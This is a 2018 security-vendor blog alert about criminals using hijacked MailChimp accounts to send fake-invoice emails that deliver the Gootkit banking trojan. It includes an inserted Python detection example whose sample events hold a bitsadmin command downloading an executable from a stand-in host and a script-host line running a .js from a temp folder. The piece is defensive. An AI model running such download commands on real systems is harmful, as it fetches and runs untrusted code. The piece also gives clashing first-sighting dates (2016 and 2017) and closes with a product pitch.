Security Alert
Jonathan Crowe
Mar 2018

Alert: Malware Being Spread via MailChimp


An increasing number of hijacked MailChimp accounts are being used to distribute spam emails and malware. Here's what you need to know.

Key Details

  • What's happening: Criminals are using compromised MailChimp accounts to blast spam emails designed to infect victims with malware.
  • Using MailChimp helps spam campaigns bypass email filters: Because MailChimp is such a well-established email marketing provider (the company has millions of customers and distributes more than 1 billion emails per day), it's less likely for these emails to get caught in spam filters.
  • Campaigns have been launching at an increasing rate since last November: Spam emails were first seen being distributed via compromised MailChimp accounts located in Australia in November 2017. Campaigns were next spotted in Italy in January, quickly followed by more campaigns launched from compromised UK and US companies in February and March. 
  • Emails linking to fake invoice files: The majority of the emails are linking to .zip files that contain .js files, which in turn download the malware payload. Other examples leverage BITSAdmin, a legitimate Windows data-transfer tool, to download the payload.
  • The malware being distributed is primarily Gootkit, a sophisticated banking trojan: Gootkit has a long, successful history of stealing passwords and other sensitive information. It has a wide range of capabilities and is notorious for its ability to evade detection from antivirus software, sandboxes, and other security solutions.
  • It's unclear how MailChimp accounts are being compromised: Experts believe the most likely explanation is that criminals are taking advantage of weak, stolen, and/or reused passwords. 
  • Barkly protects users from these attacks: Barkly blocks Gootkit and malware like it thanks to its uniquely accurate file analysis powered by machine learning.


Criminals are always looking for new opportunities to distribute malware, and now they appear to be abusing MailChimp — one of the most popular email marketing service providers — to do it. 

Researchers are seeing an increasing number of spam email campaigns being sent from compromised MailChimp accounts. The emails are often disguised as fake invoice notifications and contain links to .zip attachments that, when opened, launch JavaScript files that download a malware payload.

In the majority of campaigns, that malware has been Gootkit, a dangerous banking trojan outfitted with a variety of information-stealing capabilities (including keylogging, screen recording, and web injections) and notoriously designed for persistence and stealth. 

Researcher Derek Knight (@dvk01uk, My Online Security) has been tracking these spam campaigns closely, beginning with emails he spotted in mid-January. He's watched them ramp up in frequency to become a near-daily occurrence in late February and early March.

Each campaign has introduced small variations, with criminals experimenting with different subject lines, body copy, and malware delivery mechanisms (for more details, see the timeline below). The criminals behind these campaigns are regularly iterating in order to further optimize their success rates, but the one thing they're not changing — the one thing that's definitively working — is sending these emails from compromised MailChimp accounts. Not only is it a "free" way for these criminals to amplify their reach, it's also helping them get past email filters.

Why taking control of MailChimp accounts is a dangerous (and obvious) move for criminals

As a spammer, your general goal is obviously to get your emails in front of as many prospective victims as possible. That requires mass distribution, and one of the most tried-and-true options is renting access to a botnet (a network of compromised computers), and using it to send out your spam emails for you.

The upside of utilizing a botnet is it can seriously amplify your reach. For example, some of the most prevalent malware of the past few years (Locky ransomware and the Dridex banking trojan) both relied on distribution from the Necurs botnet in order to send out millions and millions of emails.   

The downside, of course, is using a botnet costs money. It can also be surprisingly competitive. 

The criminals behind these MailChimp campaigns have stumbled across an incredibly effective alternative. By compromising MailChimp customers — either by taking advantage of weak passwords or tricking users into handing them over via phishing attempts — criminals can use their accounts to blast out thousands and thousands of spam emails for them. 

End result: In addition to hijacking the distribution power of MailChimp, these operations are reaping an additional benefit — unlike emails sent from botnets, these are being distributed via a trusted sender. 

It's enough to make criminals ask themselves, who needs a botnet when you have compromised MailChimp accounts?

What these emails look like

As detailed in the timeline below, the emails being sent in these campaigns have varied slightly from day to day and week to week. In general, the vast majority have been disguised as invoice notifications, with links to hosted .zip files rather than those files being attached (additionally helping them bypass email filters). 

As shown in the following two examples, the emails often appear to be coming "on behalf of" an individual/organization associated with the invoice, though in some cases, the sender email address isn't a direct match. 

Fake invoice notice sent from AZ Homes List via a compromised MailChimp account.
Source: My Online Security

Fake invoice notice sent from City Sign & Graphics, LTD via a compromised MailChimp account.
Source: My Online Security

250,000 spam emails sent from one compromised account — what these hijacks look like from the MailChimp account owner's perspective 

According to reports Knight has received, once criminals have gained access to a MailChimp account they either replace the victim's subscriber list with a list of their own target email addresses, or they simply upload the additional list of target email addresses so that both lists receive the spam campaign. 

A comment left on My Online Security paints a more detailed picture:

My Mailchimp account got breached, no malware on any pc used to access the service, no login sharing, although Two-Factor wasn’t setup (It is since the breach). I knew of the breach because my main admin got a notification email from Mailchimp at 2AM saying a 250k subscriber list was successfully imported (my normal list is of about 6k), so the attackers just import their own list into the breached account and send it through there, and then just delete the sent campaign.

MailChimp account owners should be on high alert for any suspicious list uploads and/or email activity. To avoid having their accounts hijacked in the first place, experts are also urgently recommending that account owners enable two-factor authentication (2FA). Instructions from MailChimp on enabling 2FA can be found here.

MailChimp malware campaigns timeline

The first signs of criminals hijacking MailChimp accounts actually date back to November 2016, when researcher Troy Hunt reported he had received a fake invoice email notification from the news site Business News Australia.

Soon after, reports surfaced of similar emails from a variety of Australian organizations, including a Brisbane comedy club and a building inspection company.

In these early cases, it appears the criminals were simply sending out spam emails to the compromised organizations' mailing lists. That's something that would change when new emails began being sent from compromised Italian organizations this January. In these campaigns, criminals appear to have avoided sending the spam emails to the organizations' mailing lists, choosing to upload their own list of email addresses, instead.

Instead of fake invoice notifications, the emails were disguised as Italian tax notices sent from the Ministero dell’Economia e delle Finanze. 

[Timeline graphic: MailChimp malware campaigns, 2018]

A few days later, Knight began tracking new campaigns taking advantage of compromised UK and US organizations on My Online Security, noting for the first time that the malware being distributed was the Gootkit trojan.  

On January 19, spam emails were reported being sent from Sage Pay. The emails were disguised as fake invoice notifications and included a link to a .zip file. Once opened, the .zip file launched JavaScript that downloaded the Gootkit payload. 

On February 22, new campaigns were spotted being sent from organizations including Infinity Cottage and Cosmic Intelligence. In addition to including a link pointing to a .zip attachment, these emails also included a link to a macro-enabled Word document that downloaded a .scr file (which runs as an .exe on Windows computers). 

Days later, on February 26 and 27, criminals were back at it, though they apparently decided to drop the second link to the Word document and go back to including just one link to a booby-trapped .zip file. 

Changes came on March 1, when criminals switched to delivering the Ursnif trojan and changed up the deployment routine slightly. Instead of including JavaScript in the .zip file, they were now including a Windows shortcut file that downloaded the malware payload using the legitimate Microsoft data-transferring tool BITS (bitsadmin.exe) — a technique Barkly recently saw utilized in a separate spam campaign distributing the Smoke Loader trojan.

By March 5 and 6 criminals were back to distributing Gootkit, though it does appear they are still utilizing BITS. 

After a brief lull, new campaigns were launched on March 12, following what (for the moment, anyhow) appears to be a fairly stable pattern of fake invoice email --> link to .zip file containing .lnk file --> download Gootkit using bitsadmin.exe. 
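As an added detection example (not from the original alert, and not Barkly's product logic), the following Python flags the two delivery steps this timeline describes in constructed Sysmon-style process-creation records: bitsadmin.exe starting a /transfer download as a child of the interactive shell (the .lnk-in-.zip variant), and wscript.exe running a .js from a temp or download folder (the earlier .js-in-.zip variant). The events, user names and paths are made up for illustration; field names follow Sysmon Event ID 1.

```python
import re

# Constructed Sysmon-style (Event ID 1) process-creation records, hand-written
# for this example; they are not captures from the campaigns described above.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"bitsadmin /transfer job /download /priority high "
                    r"http://example.invalid/inv.exe C:\Users\bob\AppData\Local\Temp\inv.exe",
     "User": r"CORP\bob"},
    {"Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" '
                    r"C:\Users\bob\AppData\Local\Temp\Temp1_invoice.zip\invoice_2018.js",
     "User": r"CORP\bob"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",   # benign: service enumerating jobs
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"bitsadmin /list /allusers",
     "User": r"NT AUTHORITY\SYSTEM"},
    {"Image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",   # benign user activity
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"WINWORD.EXE" C:\Users\bob\Documents\report.docx',
     "User": r"CORP\bob"},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Folders where a .zip opened from an email link is typically extracted.
TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\|\\Downloads\\", re.IGNORECASE)
JS_RE = re.compile(r'\.js"?\s*$', re.IGNORECASE)
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")


def classify(event):
    """Return a reason string if the event matches a delivery step from the timeline, else None."""
    image = event["Image"].lower()
    parent = event["ParentImage"].lower()
    cmd = event["CommandLine"]
    # .lnk-in-.zip variant: the shortcut runs bitsadmin /transfer, so the BITS client
    # shows up as a child of the interactive shell with a remote URL on its command line.
    if image.endswith("bitsadmin.exe") and "/transfer" in cmd.lower() and URL_RE.search(cmd):
        if parent.endswith("explorer.exe") or TEMP_RE.search(cmd):
            return "bitsadmin_download_from_user_context"
    # .js-in-.zip variant: a script host runs a .js straight from the extraction folder.
    if image.endswith(SCRIPT_HOSTS) and JS_RE.search(cmd) and TEMP_RE.search(cmd):
        return "script_host_running_js_from_temp"
    return None


def flag_events(events):
    """Filter a list of process-creation records down to the suspicious ones."""
    return [{"user": ev["User"], "image": ev["Image"], "reason": classify(ev)}
            for ev in events if classify(ev)]
```

The two benign records (a SYSTEM-owned bitsadmin /list and a Word document opened from Documents) pass through untouched, which is the false-positive check a rule like this needs before it goes into a SIEM.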

What to do now

This has unfortunately become a very active criminal operation that requires preventative action from all of us in order to make it go away.  

MailChimp account owners:

If they haven't already, MailChimp users need to enable two-factor authentication (2FA) now. That will require anyone attempting to log in to an account to also submit a verification code, often sent to a mobile device or to a separate email address not associated with the account. As mentioned above, MailChimp has provided instructions for enabling 2FA here.

As the extent of this abuse continues to grow, MailChimp should also consider making 2FA enabled by default. That could potentially have a dramatic effect on reducing these attacks. 

Everyone else:

For the rest of us, the usual advice of informing end users about this threat and training them not to open attachments they're not expecting is key. 

But companies can avoid putting all the pressure on employees by ensuring they're properly protected by modern endpoint protection designed to block even the newest malware that antivirus solutions routinely miss.

Barkly blocks Gootkit and other malware payloads before they can do any damage


Mistakes happen, and users routinely fall for spam and phishing emails, despite regular training. Barkly serves as an effective safety net for users, blocking the Gootkit samples being distributed in these campaigns before the malware can successfully execute. 

Find out how Barkly can protect your organization and why you need endpoint security that goes beyond AV.

Jonathan Crowe

Jonathan covers the latest threats and cybersecurity trends from a practical point of view.
